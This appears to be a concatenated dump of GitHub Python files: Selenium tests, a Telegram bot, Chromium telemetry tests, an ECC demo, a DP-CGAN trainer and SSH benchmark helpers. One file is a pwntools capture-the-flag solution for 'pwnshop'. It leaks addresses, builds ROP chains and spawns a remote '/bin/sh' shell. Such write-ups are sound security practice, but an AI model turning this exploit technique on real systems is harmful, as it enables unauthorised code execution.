\"type\", \"inspect internal vamos types\")\n\n def add_args(self, arg_parser):\n sub = arg_parser.add_subparsers(dest=\"type_cmd\")\n # list\n parser = sub.add_parser(\"list\", help=\"list all types\")\n # query\n parser = sub.add_parser(\"dump\", help=\"dump a single type\")\n parser.add_argument(\"type_name\", help=\"name of type\")\n # lookup\n parser = sub.add_parser(\"lookup\", help=\"lookup field in type\")\n parser.add_argument(\"type_name\", help=\"name of type\")\n parser.add_argument(\"type_field_path\", help=\"field_path, e.g. foo.bar\")\n # offset\n parser = sub.add_parser(\"offset\", help=\"find field by offset\")\n parser.add_argument(\"type_name\", help=\"name of type\")\n parser.add_argument(\"type_offset\", help=\"offset of field\")\n\n def run(self, args):\n type_cmd = args.type_cmd\n # list\n if type_cmd == \"list\":\n type_names = AmigaStructTypes.get_all_struct_names()\n for tn in sorted(type_names):\n print(tn)\n return 0\n # dump\n elif type_cmd == \"dump\":\n name = args.type_name\n s = AmigaStructTypes.find_struct(name)\n if s is None:\n print(\"type '%s' not found!\" % name, file=sys.stderr)\n return 1\n else:\n td = TypeDumper()\n td.dump(s)\n return 0\n # lookup\n elif type_cmd == \"lookup\":\n name = args.type_name\n s = AmigaStructTypes.find_struct(name)\n if s is None:\n print(\"type '%s' not found!\" % name, file=sys.stderr)\n return 1\n else:\n field_path = args.type_field_path\n field_names = field_path.split(\".\")\n field_defs = s.sdef.find_sub_field_defs_by_name(*field_names)\n if field_defs:\n td = TypeDumper()\n td.dump_fields(*field_defs)\n return 0\n else:\n print(\"Field not found:\", field_path, file=sys.stderr)\n return 1\n # offset\n elif type_cmd == \"offset\":\n name = args.type_name\n s = AmigaStructTypes.find_struct(name)\n if s is None:\n print(\"type '%s' not found!\" % name, file=sys.stderr)\n return 1\n else:\n offset = parse_scalar(int, args.type_offset)\n field_defs, delta = s.sdef.find_sub_field_defs_by_offset(offset)\n if field_defs:\n td = TypeDumper()\n td.dump_fields(*field_defs)\n return 0\n else:\n print(\"No Field found at\", offset, file=sys.stderr)\n return 1\n\n def _dump_fields(self, where, fields):\n if len(fields) == 0:\n print(\"no fields found: %s\" % where, file=sys.stderr)\n return 1\n else:\n off = 0\n for f in fields:\n total = off + f.offset\n print(\n \"@%04x +%04x = %04x (size=%04x) %s\"\n % (off, f.offset, total, f.size, f.name)\n )\n off += f.offset\n return 0\n","repo_name":"cnvogelg/amitools","sub_path":"amitools/vamos/tools/type.py","file_name":"type.py","file_ext":"py","file_size_in_byte":3534,"program_lang":"python","lang":"en","doc_type":"code","stars":235,"dataset":"github-code","pt":"50"} +{"seq_id":"33192371273","text":"import unittest\nfrom time import sleep\nfrom selenium import webdriver\nfrom parameterized import parameterized\n\nclass test_baidu(unittest.TestCase):\n @classmethod\n def setUpClass(cls) -> None:\n cls.driver = webdriver.Chrome()\n cls.base_url = \"https://www.baidu.com/\"\n\n @classmethod\n def tearDownClass(cls) -> None:\n cls.driver.quit()\n\n def baidu_search(self, search_key):\n self.driver.get(self.base_url)\n self.driver.find_element_by_css_selector(\"#kw\").send_keys(search_key)\n self.driver.find_element_by_css_selector(\"#su\").click()\n sleep(2)\n @parameterized.expand([\n (\"case1\",\"selenium\"),\n (\"case2\", \"unittest\"),\n (\"case3\", \"parameterized\")\n ])\n def test_search(self,name,key_word):\n self.baidu_search(key_word)\n self.assertEqual(self.driver.title, key_word+\"_百度搜索\")\n\nif __name__ == '__main__':\n unittest.main(verbosity=2)\n","repo_name":"UULIN/automation_test","sub_path":"unit7_unittest_expand/test_case/test_parameterized_baidu.py","file_name":"test_parameterized_baidu.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30302579506","text":"# Напишите программу, которая позволяет считывать из файла вопрос, отвечать на него и отправлять ответ обратно пользователю.\n\nimport telebot\n\n\nbot = telebot.TeleBot('')\n\n@bot.message_handler(commands=['ответ'])\ndef send_welcome(message):\n bot.send_message(message.from_user.id,\n f'Здравствуйте {message.from_user.first_name} ')\n\n@bot.message_handler(content_types=['text'])\ndef request(message):\n text = message.text\n if text != 'ok':\n with open('appel.txt', 'r', encoding='utf-8') as file:\n request = file.read().replace('\\n', ':').split(':') \n answer = 'Погода завтра будет солнечная'\n bot.send_message(request[0], f'Вы спрашивали: {request[1]}')\n bot.send_message(request[0], f'Ответ: {answer}')\n\n\nbot.polling()\n","repo_name":"madnov/Python_lessons","sub_path":"Home_work_8/Task_2.py","file_name":"Task_2.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12311795125","text":"from telemetry.page import page as page_module\nfrom telemetry import story\n\n# Even though we don't specialize page behavior directly, we have to define our\n# own page class so that |story.serving_dir| fetched from the StorySet will\n# reflect the path to our containing directory, under which we serve local files\n# for recording. See also initialization of |base_dir| in telemetry's page.Page\n# constructor, which is in turn referenced by |file_path_url|.\nclass PartialInvalidationCasesPage(page_module.Page):\n\n def __init__(self, url, page_set):\n super(PartialInvalidationCasesPage, self).__init__(\n url=url, page_set=page_set, name=url.split('/')[-1])\n\n\nclass PartialInvalidationCasesPageSet(story.StorySet):\n\n \"\"\" Page set consisting of pages specialized for partial invalidation,\n for example, pages with many elements. \"\"\"\n\n def __init__(self):\n super(PartialInvalidationCasesPageSet, self).__init__(\n cloud_storage_bucket=story.PARTNER_BUCKET)\n\n other_urls = [\n # Why: Reduced test case similar to the single page html5 spec wherein\n # we saw a performance regression demonstrable via a small partial\n # invalidation.\n 'file://partial_invalidation_cases/800_relpos_divs.html',\n ]\n\n for url in other_urls:\n self.AddStory(PartialInvalidationCasesPage(url, self))\n","repo_name":"kiwibrowser/src","sub_path":"tools/perf/page_sets/partial_invalidation_cases.py","file_name":"partial_invalidation_cases.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":2475,"dataset":"github-code","pt":"52"} +{"seq_id":"41921389088","text":"from fpdf import FPDF # importing FPDF for generating pdf\r\nimport os # importing os for opening of pdf directly\r\n\r\n\r\ndef pdf_file():\r\n # creating a pdf and adding a page\r\n pdf = FPDF()\r\n pdf.add_page()\r\n pdf.set_font(\"Times\", size=13)\r\n\r\n f = open(\"vahini.txt\", \"r\") # taking text file to print text in pdf\r\n for x in f:\r\n pdf.cell(200, 10, txt=x, ln=1, align='L')\r\n # output pdf\r\n pdf.output(\"my.pdf\")\r\n os.system('my.pdf')\r\n\r\n","repo_name":"vahinisaisree/final","sub_path":"pds.py","file_name":"pds.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12508939845","text":"import unittest\n\nfrom telemetry import decorators\nfrom telemetry.internal.browser import browser_options\nfrom telemetry.internal.platform import android_device\nfrom telemetry.internal.platform import remote_platform_options\nfrom telemetry.testing import system_stub\nimport mock\n\nfrom devil.android import device_utils\nfrom devil.android import device_blacklist\n\n\nclass _BaseAndroidDeviceTest(unittest.TestCase):\n def setUp(self):\n def check_blacklist_arg(blacklist):\n self.assertTrue(blacklist is None\n or isinstance(blacklist, device_blacklist.Blacklist))\n return mock.DEFAULT\n\n self._healthy_device_patcher = mock.patch(\n 'devil.android.device_utils.DeviceUtils.HealthyDevices')\n self._healthy_device_mock = self._healthy_device_patcher.start()\n self._healthy_device_mock.side_effect = check_blacklist_arg\n self._android_device_stub = system_stub.Override(\n android_device, ['subprocess'])\n\n def _GetMockDeviceUtils(self, device_serial):\n device = device_utils.DeviceUtils(device_serial)\n return device\n\n def tearDown(self):\n self._healthy_device_patcher.stop()\n self._android_device_stub.Restore()\n\n\nclass AndroidDeviceTest(_BaseAndroidDeviceTest):\n @decorators.Enabled('android')\n def testGetAllAttachedAndroidDevices(self):\n self._healthy_device_mock.return_value = [\n self._GetMockDeviceUtils('01'),\n self._GetMockDeviceUtils('02')]\n self.assertEquals(\n set(['01', '02']),\n set(device.device_id for device in\n android_device.AndroidDevice.GetAllConnectedDevices(None)))\n\n @decorators.Enabled('android')\n @mock.patch('telemetry.internal.platform.android_device.logging.warning')\n def testNoAdbReturnsNone(self, warning_mock):\n finder_options = browser_options.BrowserFinderOptions()\n with (\n mock.patch('os.path.isabs', return_value=True)), (\n mock.patch('os.path.exists', return_value=False)):\n self.assertEquals(warning_mock.call_count, 0)\n self.assertIsNone(android_device.GetDevice(finder_options))\n\n # https://github.com/catapult-project/catapult/issues/3099 (Android)\n @decorators.Disabled('all')\n @mock.patch('telemetry.internal.platform.android_device.logging.warning')\n def testAdbNoDevicesReturnsNone(self, warning_mock):\n finder_options = browser_options.BrowserFinderOptions()\n with mock.patch('os.path.isabs', return_value=False):\n self._healthy_device_mock.return_value = []\n self.assertEquals(warning_mock.call_count, 0)\n self.assertIsNone(android_device.GetDevice(finder_options))\n\n # https://github.com/catapult-project/catapult/issues/3099 (Android)\n @decorators.Disabled('all')\n @mock.patch('telemetry.internal.platform.android_device.logging.warning')\n def testAdbTwoDevicesReturnsNone(self, warning_mock):\n finder_options = browser_options.BrowserFinderOptions()\n with mock.patch('os.path.isabs', return_value=False):\n self._healthy_device_mock.return_value = [\n self._GetMockDeviceUtils('015d14fec128220c'),\n self._GetMockDeviceUtils('015d14fec128220d')]\n device = android_device.GetDevice(finder_options)\n warning_mock.assert_called_with(\n 'Multiple devices attached. Please specify one of the following:\\n'\n ' --device=015d14fec128220c\\n'\n ' --device=015d14fec128220d')\n self.assertIsNone(device)\n\n @decorators.Enabled('android')\n @mock.patch('telemetry.internal.platform.android_device.logging.warning')\n def testAdbPickOneDeviceReturnsDeviceInstance(self, warning_mock):\n finder_options = browser_options.BrowserFinderOptions()\n platform_options = remote_platform_options.AndroidPlatformOptions(\n device='555d14fecddddddd') # pick one\n finder_options.remote_platform_options = platform_options\n with mock.patch('os.path.isabs', return_value=False):\n self._healthy_device_mock.return_value = [\n self._GetMockDeviceUtils('015d14fec128220c'),\n self._GetMockDeviceUtils('555d14fecddddddd')]\n device = android_device.GetDevice(finder_options)\n self.assertEquals(warning_mock.call_count, 0)\n self.assertEquals('555d14fecddddddd', device.device_id)\n\n # https://github.com/catapult-project/catapult/issues/3099 (Android)\n @decorators.Disabled('all')\n @mock.patch('telemetry.internal.platform.android_device.logging.warning')\n def testAdbOneDeviceReturnsDeviceInstance(self, warning_mock):\n finder_options = browser_options.BrowserFinderOptions()\n with mock.patch('os.path.isabs', return_value=False):\n self._healthy_device_mock.return_value = [\n self._GetMockDeviceUtils('015d14fec128220c')]\n device = android_device.GetDevice(finder_options)\n self.assertEquals(warning_mock.call_count, 0)\n self.assertEquals('015d14fec128220c', device.device_id)\n\n\nclass FindAllAvailableDevicesTest(_BaseAndroidDeviceTest):\n\n @decorators.Disabled('all')\n @mock.patch('telemetry.internal.platform.android_device.logging.warning')\n # https://github.com/catapult-project/catapult/issues/3099 (Android)\n def testAdbNoDeviceReturnsEmptyList(self, warning_mock):\n finder_options = browser_options.BrowserFinderOptions()\n with mock.patch('os.path.isabs', return_value=False):\n self._healthy_device_mock.return_value = []\n devices = android_device.FindAllAvailableDevices(finder_options)\n self.assertEquals(warning_mock.call_count, 0)\n self.assertIsNotNone(devices)\n self.assertEquals(len(devices), 0)\n\n\n @decorators.Disabled('all')\n @mock.patch('telemetry.internal.platform.android_device.logging.warning')\n # https://github.com/catapult-project/catapult/issues/3099 (Android)\n def testAdbOneDeviceReturnsListWithOneDeviceInstance(self, warning_mock):\n finder_options = browser_options.BrowserFinderOptions()\n with mock.patch('os.path.isabs', return_value=False):\n self._healthy_device_mock.return_value = [\n self._GetMockDeviceUtils('015d14fec128220c')]\n devices = android_device.FindAllAvailableDevices(finder_options)\n self.assertEquals(warning_mock.call_count, 0)\n self.assertIsNotNone(devices)\n self.assertEquals(len(devices), 1)\n self.assertEquals('015d14fec128220c', devices[0].device_id)\n\n\n @decorators.Disabled('all')\n @mock.patch('telemetry.internal.platform.android_device.logging.warning')\n # https://github.com/catapult-project/catapult/issues/3099 (Android)\n def testAdbMultipleDevicesReturnsListWithAllDeviceInstances(self, warning_mock):\n finder_options = browser_options.BrowserFinderOptions()\n with mock.patch('os.path.isabs', return_value=False):\n self._healthy_device_mock.return_value = [\n self._GetMockDeviceUtils('015d14fec128220c'),\n self._GetMockDeviceUtils('015d14fec128220d'),\n self._GetMockDeviceUtils('015d14fec128220e')]\n devices = android_device.FindAllAvailableDevices(finder_options)\n self.assertEquals(warning_mock.call_count, 0)\n self.assertIsNotNone(devices)\n self.assertEquals(len(devices), 3)\n self.assertEquals(devices[0].guid, '015d14fec128220c')\n self.assertEquals(devices[1].guid, '015d14fec128220d')\n self.assertEquals(devices[2].guid, '015d14fec128220e')\n","repo_name":"kiwibrowser/src","sub_path":"third_party/catapult/telemetry/telemetry/internal/platform/android_device_unittest.py","file_name":"android_device_unittest.py","file_ext":"py","file_size_in_byte":7221,"program_lang":"python","lang":"en","doc_type":"code","stars":2475,"dataset":"github-code","pt":"52"} +{"seq_id":"2776242778","text":"import json\nimport csv\nimport yaml\n\n\nclass DictionaryList:\n\n def __init__(self):\n self._items = []\n\n def __next_id(self):\n if not self._items:\n return 1\n else:\n return max([item[\"id\"] for item in self._items]) + 1\n\n def append(self, **item):\n\n item[\"id\"] = self.__next_id()\n self._items.append(item)\n return self\n\n def to_console(self):\n\n for item in self._items:\n for key in sorted(item):\n print(f\"{key}: {item[key]}\")\n\n\nclass JsonOutputMixin:\n\n def to_json(self):\n return json.dumps(self._items)\n\n\nclass CsvOutputMixin:\n\n def to_csv(self, csv_file_name):\n\n with open(csv_file_name, \"w\") as csv_file:\n csv_writer = csv.DictWriter(csv_file, self._items[0])\n csv_writer.writeheader()\n for item in self._items:\n csv_writer.writerow(item)\n\n\nclass YamlOutputMixin:\n\n def to_yaml(self):\n return yaml.dump(self._items)\n\n\nclass ColorList(DictionaryList, JsonOutputMixin, CsvOutputMixin,\n YamlOutputMixin):\n\n def append(self, color_name, color_hexcode):\n super().append(name=color_name, hexcode=color_hexcode)\n\n\ndef main():\n\n colors = ColorList()\n colors.append(\"red\", \"ff0000\")\n colors.append(\"green\", \"00ff00\")\n colors.append(\"blue\", \"0000ff\")\n\n colors.to_console()\n\n print(colors.to_json())\n\n colors.to_csv(\"colors.csv\")\n\n print(colors.to_yaml())\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"craigmckeachie/python_demos","sub_path":"object-oriented-part2/mixin.py","file_name":"mixin.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23642709967","text":"from torch.utils.data import Dataset, Subset\nimport glob\nimport cv2 as cv\nimport numpy as np\n\n\nclass DatasetTiles(Dataset):\n r\"\"\"\n Class to load the dataset of a specific defect.\n \"\"\"\n\n def __init__(self, parent_dir, defect, width=256, height=256):\n r\"\"\"\n Load the dataset.\n :param parent_dir: root folder.\n :param defect: directory of the defect.\n\n Image format:\n - .jpg: image\n - .png: binay mask\n \"\"\"\n self.img_list_path = glob.glob(parent_dir + '/' + defect + '/Imgs/*.jpg')\n self.img_mask_list_path = glob.glob(parent_dir + '/' + defect + '/Imgs/*.png')\n\n self.width = width\n self.height = height\n\n print(f\"{defect} loaded!\")\n\n def __getitem__(self, index):\n r\"\"\"\n Get the image and its mask\n :param index: index of the specific image\n \"\"\"\n\n x = self.preprocessing(self.img_list_path[index], False)\n # Resize input format [height, width, n_channels]\n x = np.rollaxis(x, 2, 0)\n\n y = self.preprocessing(self.img_mask_list_path[index], True)\n # Add 1 channel to input. Input format [height, width, n_channels]\n y = np.expand_dims(y, axis=0)\n\n return x, y\n\n def preprocessing(self, img, convert_to_gray):\n r\"\"\"\n Performs a preprocessing on the image.\n :param img: img to be processed\n :param convert_to_gray: true if the conversion is grayscale, false otherwise.\n \"\"\"\n\n img = cv.imread(img)\n img = cv.resize(img, (self.width, self.height))\n\n if convert_to_gray:\n img = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n\n else:\n img = cv.cvtColor(img, cv.COLOR_RGB2BGR)\n\n img = img / 255\n img = img.astype(np.float32)\n\n return img\n\n def __len__(self):\n return len(self.img_list_path)\n\n\ndef train_test_split(dataset):\n r\"\"\"\n Slip dataset in training, validation and test set:\n - 70% training set;\n - 20% validation set:\n - 10% test set.\n\n :param dataset: dataset to split\n :return : training, validation and test set.\n \"\"\"\n length_dataset = len(dataset)\n\n length_train = np.int_(length_dataset * 0.7)\n length_validate = np.int_(length_dataset * 0.2)\n\n training_dataset = Subset(dataset, range(0, length_train))\n validation_dataset = Subset(dataset, range(length_train, length_train + length_validate))\n test_dataset = Subset(dataset, range(length_train + length_validate, len(dataset)))\n\n return training_dataset, validation_dataset, test_dataset\n","repo_name":"lollopagno/DefectTiles","sub_path":"UNet/DatasetTiles/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29398354924","text":"# import all functions from the ecc_func.py\nfrom ecc_func import *\n\n\n# ElGamal decryption\ndef decryption(C1, C2, d, p, a, b):\n\n # Compute the plaintext M = C2 - dC1\n dC1 = ec_mult(d, C1, p, a, b)\n dC1 = Point(dC1.x, -dC1.y % p)\n M = ec_add(C2, dC1, p, a, b)\n\n # The plaintext M can be sent to the recipient\n return M\n\n\n# main program\nif __name__ == '__main__':\n print(\"Curve E: y^2 = x^3 + ax + b (mod p)\")\n\n # get the curve parameters\n p = 7559\n a = 0\n b = 7\n\n # get generator G\n G = Point(12, 217)\n\n # get the message M as a point on the curve\n M = Point(3085, 2919)\n\n # get the ciphertext\n C1, C2 = get_ciphertext()\n\n # get the private key\n d = get_private_key()\n\n # decrypt the ciphertext\n P = decryption(C1, C2, d, p, a, b)\n\n # print the plaintext\n print(f'Plaintext: ({P.x}, {P.y})')\n\n # The plaintext P = (3085, 2919) is the original message\n","repo_name":"kn-vardhan/Elliptic-Curve-Cryptography","sub_path":"Codes/elgamal-decrypt.py","file_name":"elgamal-decrypt.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38223378656","text":"import logging\nfrom dataclasses import dataclass\nfrom typing import Tuple\n\nimport cgan\nimport dataset\nimport numpy as np\nimport opacus\nimport torch\nfrom sklearn import metrics\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.preprocessing import LabelBinarizer\nfrom utils import setup_logging\n\nlogger = logging.getLogger(__name__)\nsetup_logging(print_level=\"INFO\", logger=logger)\n\n\n@dataclass\nclass Trainer:\n \"\"\"A trainer for CGAN with differential privacy\"\"\"\n\n generator: cgan.Generator\n optimizerG: torch.optim\n discriminator: cgan.Discriminator\n optimizerD: torch.optim\n criterion: torch.nn.modules.loss\n #privacy_engine: opacus.privacy_engine.PrivacyEngine\n train_loader: torch.utils.data.dataloader.DataLoader\n test_dataset: dataset.TabularDataset\n target_epsilon: float\n target_delta: float\n device: str\n epochs: int\n latent_dim: int\n fixed_noise: torch.Tensor\n fixed_labels: np.ndarray\n exp_dir: str\n eval_period: int\n\n def __post_init__(self):\n self.n_classes = self.test_dataset.num_classes()\n\n def train(self) -> Tuple[list, list]:\n \"\"\"Trains the CGAN model with differetial privacy\n\n Returns:\n A tuple containing list of evaluation metrics: AUC and average\n precision\n \"\"\"\n\n iteration = 0\n best_auc = 0\n budget = True\n mlp_aucs = []\n mlp_aps = []\n\n for epoch in range(self.epochs):\n\n #if not budget:\n # logger.info(\n # \"Privacy budget exceeded! Iteration = %d, ε = %.3f\"\n # % (iteration, epsilon) # noqa: F821\n # )\n # break\n\n for _, data in enumerate(self.train_loader):\n\n real_data = data[0].type(torch.FloatTensor).to(self.device)\n real_labels = data[1].to(self.device)\n batch_size = real_data.size(0)\n\n label_fake = torch.full(\n (batch_size, 1), 0.0, device=self.device\n )\n label_true = torch.full(\n (batch_size, 1), 1.0, device=self.device\n )\n\n ######################\n # (1) Update D network\n ######################\n self.optimizerD.zero_grad()\n\n # train with fake data\n noise = torch.randn(\n batch_size, self.latent_dim, device=self.device\n )\n gen_labels = torch.randint(\n 0, self.n_classes, (batch_size,), device=self.device\n )\n\n fake = self.generator(noise, gen_labels)\n\n output = self.discriminator(fake.detach(), gen_labels)\n errD_fake = self.criterion(output, label_fake)\n errD_fake.backward()\n self.optimizerD.step()\n self.optimizerD.zero_grad()\n\n # train with real data\n output = self.discriminator(real_data, real_labels)\n errD_real = self.criterion(output, label_true)\n errD_real.backward()\n self.optimizerD.step()\n\n errD = errD_real + errD_fake\n\n ######################\n # (2) Update G network\n ######################\n self.optimizerG.zero_grad()\n self.optimizerD.zero_grad()\n\n output_g = self.discriminator(fake, gen_labels)\n errG = self.criterion(output_g, label_true)\n errG.backward()\n\n self.optimizerG.step()\n\n #\n #(\n # epsilon,\n # best_alpha,\n #) = self.privacy_engine.accountant.get_privacy_spent(\n # delta=self.target_delta\n #)\n\n #if epsilon > self.target_epsilon:\n # budget = False\n # break\n\n iteration = iteration + 1\n if iteration % self.eval_period == 0:\n\n logger.info(\n \"Iteration = %d, Loss_D = %.2f, Loss_G = %.2f\"\n % (iteration, errD.item(), errG.item())\n )\n #logger.info(\n # \"(ε = %.3f, δ = %.2f) for α = %.2f\"\n # % (epsilon, self.target_delta, best_alpha)\n #)\n mlp_auc, mlp_ap = self._eval()\n mlp_aucs.append(mlp_auc)\n mlp_aps.append(mlp_ap)\n logger.info(\n \"mlp_auc = %.3f, mlp_ap = %.3f\" % (mlp_auc, mlp_ap)\n )\n if mlp_auc > best_auc:\n best_auc = mlp_auc\n logger.info(\n f\"Checkpoint saved at iteration={iteration} \"\n # f\"eps={epsilon:.3f}\"\n )\n torch.save(\n {\n \"discriminator\": (\n self.discriminator.state_dict()\n ),\n \"generator\": self.generator.state_dict(),\n #\"accountant\": self.privacy_engine.accountant,\n \"optimizerG\": self.optimizerG.state_dict(),\n \"optimmizerD\": self.optimizerD.state_dict(),\n },\n f\"{self.exp_dir}/checkpoint_{iteration}.pth\"\n #f\"{epsilon:.3f}.pth\",\n )\n\n return mlp_aucs, mlp_aps\n\n def _eval(self) -> Tuple[float, float]:\n \"\"\"Evaluates the model by applying mlp classifier\n\n Returns:\n A tuple containing the classifier AUC and average precision\n \"\"\"\n fake_features, fake_labels = self._generate_fake_data()\n mlp = MLPClassifier(early_stopping=True).fit(\n fake_features, fake_labels\n )\n class_probs = mlp.predict_proba(self.test_dataset.features)\n auc = metrics.roc_auc_score(\n self.test_dataset.labels,\n class_probs,\n average=\"weighted\",\n multi_class=\"ovo\",\n )\n\n if self.n_classes > 2:\n lb = LabelBinarizer()\n lb.fit(self.test_dataset.labels)\n y_test = lb.transform(self.test_dataset.labels)\n else:\n y_test = self.test_dataset.labels\n\n ap = metrics.average_precision_score(y_test, class_probs)\n return auc, ap\n\n def _generate_fake_data(self) -> Tuple[np.ndarray, np.ndarray]:\n \"\"\"generates fake dataset using the DP-CGAN generator\n\n Returns:\n A tuple of generted features and their corresponding labels\n \"\"\"\n fixed_labels = torch.from_numpy(self.fixed_labels).to(self.device)\n fake_features = self.generator(self.fixed_noise, fixed_labels).detach()\n fake_features = fake_features.cpu().numpy()\n return fake_features, self.fixed_labels\n","repo_name":"Ilnazad/vector_institute","sub_path":"trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":7171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27677911716","text":"import paramiko\nimport itertools\n\n\ndef GenProduct(config):\n keys, values = zip(*config.items())\n permutations_config = [dict(zip(keys, v))\n for v in itertools.product(*values)]\n return permutations_config\n\n\ndef GenBinding(config_list):\n r = []\n for each in config_list:\n r += GenProduct(each)\n return r\n\n\ndef RemoteExecute(server, command, path, print_show=True):\n import re\n print_command = re.sub(r' +', ' ', command)\n # print_command = command.replace('\\t', ' ')\n if print_show:\n print(f\"==={server}=== {print_command}\")\n client = paramiko.SSHClient()\n client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n client.connect(server)\n\n if path == '':\n stdin, stdout, stderr = client.exec_command(\n command,)\n else:\n stdin, stdout, stderr = client.exec_command(\n f'cd {path}; {command}',)\n\n stdout_iter = iter(stdout.readline, '')\n stderr_iter = iter(stderr.readline, '')\n\n from itertools import zip_longest\n\n for out, err in zip_longest(stdout_iter, stderr_iter):\n if out:\n if print_show:\n print(out.strip())\n if err:\n if print_show:\n print(err.strip())\n\n # for line in stdout:\n # print(line, end='')\n client.close()\n return stdout.channel.recv_exit_status()\n\n\ndef Pnuke(servers, pattern):\n print(f\"==={servers}=== Pnuke {pattern}\")\n if type(servers) is not list:\n servers = [servers]\n import subprocess\n import concurrent.futures\n\n def command_fn(host):\n client = paramiko.SSHClient()\n client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n client.connect(host)\n ret = 0\n while ret == 0:\n command = f\"ps aux |grep {pattern}| grep -v grep | awk '{{print $2}}' | xargs kill -9\"\n stdin, stdout, stderr = client.exec_command(\n command\n )\n ret = stdout.channel.recv_exit_status()\n client.close()\n with concurrent.futures.ThreadPoolExecutor(max_workers=20) as executor:\n for each in servers:\n executor.submit(command_fn, each)\n\n\ndef disjoint_dicts_to_one_dict(dicts):\n a = dicts[0].copy()\n for i in range(1, len(dicts)):\n a.update(dicts[i])\n return a\n\n\ndef StringnizeConfig(config):\n for each_k in config.keys():\n config[each_k] = [str(each) for each in config[each_k]]\n\n\ndef PreprocessConfig(config):\n # StringnizeConfig(config)\n if 'binding' in config:\n config_binding = config['binding']\n del config['binding']\n permutations_binding_config = GenBinding(config_binding)\n permutations_config = GenProduct(config)\n permutations_config = itertools.product(\n permutations_config, permutations_binding_config, )\n\n # [(dictA, dictB), (dictA, dictB), (dictA, dictB),]\n permutations_config = [disjoint_dicts_to_one_dict(each)\n for each in permutations_config]\n return permutations_config\n else:\n return GenProduct(config)\n","repo_name":"thustorage/PetPS","sub_path":"benchmark/bench_util.py","file_name":"bench_util.py","file_ext":"py","file_size_in_byte":3123,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"52"} +{"seq_id":"33036566570","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 09 15:16:42 2017\n\n@author: ralall\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import curve_fit\nfrom scipy import log as log\n\ndef func(x, a, b, c):\n return a * log(b * x) + c\n\nx = np.array([0, 1.1029, 1.6148])\ny = np.array([-8.5067, -6.8924, -6.713])\n\npopt, pcov = curve_fit (func, x, y)\n\nplt.figure()\nplt.plot(x, y, 'k.', label = 'Raw Data')\nplt.plot(x, func(x, *popt), 'k-', label = 'Fitted Curve')\nplt.xlabel('ln(x)')\nplt.ylabel('y')\nplt.legend()\nplt.show()","repo_name":"Nimitkothari/Analytics","sub_path":"Python-anlytics/testnon.py","file_name":"testnon.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42285760166","text":"#!/usr/bin/env python\n\n\nfrom pwn import *\n\nBINARY = \"./pwnshop\"\nLIBC = \"./libc.so.6\"\nADDR = \"138.68.148.149\"\nPORT = 30975\n\nsplash()\nelf = context.binary = ELF(BINARY)\nlibc = ELF(LIBC, checksec=False)\n\n\nclass Offsets:\n fake_frame_offset = 0x40C0\n buy_offset = 0x132A\n\n\nclass Gadgets:\n sub_rsp_0x28_ret = 0x1219\n pop_rdi_ret = 0x13C3\n\n\ndef conn():\n if args.LOCAL:\n pty = process.PTY\n return process(elf.path, stdin=pty, stdout=pty, stderr=pty)\n\n else:\n return remote(ADDR, PORT)\n\n\ndef solve():\n io = conn()\n\n io.sendlineafter(\"> \", \"2\")\n io.sendlineafter(\"What do you wish to sell? \", \"\")\n io.sendlineafter(\"How much do you want for it? \", cyclic(0x7, n=8))\n io.recvuntil(\"? \")\n elf_leak = io.recvuntil(\"?\")[:-1]\n elf_leak = u64(elf_leak[8:].ljust(8, b\"\\x00\"))\n elf.address = elf_leak - Offsets.fake_frame_offset\n log.success(f\"elf base address found: {hex(elf.address)}\")\n log.success(f\"fake frame found @: {hex(elf_leak)}\")\n\n payload = [\n cyclic(40, n=8),\n elf.address + Gadgets.pop_rdi_ret,\n elf.got.puts,\n elf.plt.puts,\n elf.address + Offsets.buy_offset,\n elf.address + Gadgets.sub_rsp_0x28_ret,\n ]\n io.sendlineafter(\"> \", \"1\")\n io.sendafter(\"Enter details: \", flat(payload))\n puts_leak = io.recvuntil(\"\\n\")[:-1]\n puts_leak = u64(puts_leak.ljust(8, b\"\\x00\"))\n libc.address = puts_leak - libc.sym.puts\n bin_sh = next(libc.search(b\"/bin/sh\\x00\"))\n log.success(f\"puts@got found @: {hex(puts_leak)}\")\n log.success(f\"libc base address found @: {hex(libc.address)}\")\n log.success(f\"/bin/sh string found @: {hex(bin_sh)}\")\n\n payload = [\n cyclic(40, n=8),\n elf.address + Gadgets.pop_rdi_ret,\n bin_sh,\n libc.sym.system,\n libc.sym.exit,\n elf.address + Gadgets.sub_rsp_0x28_ret,\n ]\n io.sendafter(\"Enter details: \", flat(payload))\n\n io.interactive()\n\n\nif __name__ == \"__main__\":\n solve()\n","repo_name":"one2blame/ctf","sub_path":"htb/pwnshop/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":1979,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"73226464166","text":"from oslo_config import cfg\nfrom oslo_log import log as logging\nfrom pecan import 